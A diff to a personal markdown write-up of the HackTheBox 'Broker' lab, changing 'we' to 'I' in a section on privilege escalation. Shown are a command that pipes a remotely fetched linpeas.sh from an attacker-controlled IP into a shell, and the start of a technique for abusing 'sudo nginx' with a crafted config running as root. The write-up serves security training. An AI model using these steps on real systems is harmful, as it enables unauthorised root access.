TonyDuran/kata/HackTheBox/Broker.md

 curl http://<your-ip>:8000/linpeas.sh | sh
 ```

-Finally, we decided to look at what others did and came across a clean privilege escalation with Nginx.
+Finally, I decided to look at what others did and came across a clean privilege escalation with Nginx.
 This is where the rest of the credit goes to `0xdf`.
 Hopefully with practice, I can improve on privilege escalation.
 Essentially, `sudo nginx` allows you to run a webserver as root.
 Thereby, allowing you to expose the root.txt flag.

 First, you need to make a nginx.conf.
 Using `0xdf`'s example, I was able to write the file and `curl` it to the victim's machine (using the http.server).

 Now, you want to save this file in a specific location that can run as root (I believe.).
-We stored it as `0xdf` did at `/dev/shm/nginx.conf`
+I stored it as `0xdf` did at `/dev/shm/nginx.conf`

 ```
 user root;